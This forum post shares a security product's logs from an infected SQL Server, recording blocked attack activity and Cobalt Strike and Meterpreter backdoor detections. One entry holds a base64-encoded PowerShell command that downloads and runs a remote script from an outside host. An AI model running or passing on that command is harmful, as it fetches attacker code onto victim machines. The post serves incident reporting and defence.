This post was last edited by LovelyTim on 2022-6-7 11:17
Posting the log file as well, by the way.
Since it was the same virus both times,
I'm only posting the latest records:
- 【2】2022-06-06 16:00:15,系统防护,应用加固,sqlservr.exe触犯应用加固规则, 已阻止
- 防护项目:数据库
- 操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- 操作目标参数:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe/c -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AbQBzAHMAcQBsAC4AbABvAGEAZABlAHIAMAAxADEAOAAuAHgAeQB6ADoAMQA0ADMAMwAvAG0AcwBzAHEAbAA3AC4AdAB4AHQAJwApADsA
- 操作结果:已阻止
- 保护进程路径:D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
- 保护进程命令行:"D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
- 【3】2022-06-06 15:59:28,病毒防护,文件实时监控,发现病毒Backdoor/CobaltStrike.l, 已处理
- 病毒名称:Backdoor/CobaltStrike.l
- 病毒ID:976F2654168CFB4F
- 病毒路径:C:\Windows\Temp\TmpA0C0.tmp
- 操作类型:修改
- 操作结果:已处理
- 进程ID:1760
- 操作进程:D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
- 操作进程命令行:"D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
- 父进程:C:\Windows\System32\services.exe
- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
- 【4】2022-06-06 15:59:07,病毒防护,文件实时监控,发现病毒Backdoor/CobaltStrike.l, 已处理
- 病毒名称:Backdoor/CobaltStrike.l
- 病毒ID:976F2654168CFB4F
- 病毒路径:C:\Windows\Temp\Tmp5157.tmp
- 操作类型:修改
- 操作结果:已处理
- 进程ID:1760
- 操作进程:D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
- 操作进程命令行:"D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
- 父进程:C:\Windows\System32\services.exe
- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
- 【5】2022-06-06 15:58:50,病毒防护,文件实时监控,发现病毒Backdoor/Meterpreter.ak, 已处理
- 病毒名称:Backdoor/Meterpreter.ak
- 病毒ID:A00D08EFDA1AA78C
- 病毒路径:C:\Windows\Temp\TmpD48.tmp
- 操作类型:修改
- 操作结果:已处理
- 进程ID:1760
- 操作进程:D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
- 操作进程命令行:"D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
- 父进程:C:\Windows\System32\services.exe
- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
- 【6】2022-06-06 15:58:46,病毒防护,文件实时监控,发现病毒Backdoor/Meterpreter.ak, 已处理
- 病毒名称:Backdoor/Meterpreter.ak
- 病毒ID:A00D08EFDA1AA78C
- 病毒路径:C:\Windows\Temp\TmpFB07.tmp
- 操作类型:修改
- 操作结果:已处理
- 进程ID:1760
- 操作进程:D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
- 操作进程命令行:"D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
- 父进程:C:\Windows\System32\services.exe
- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>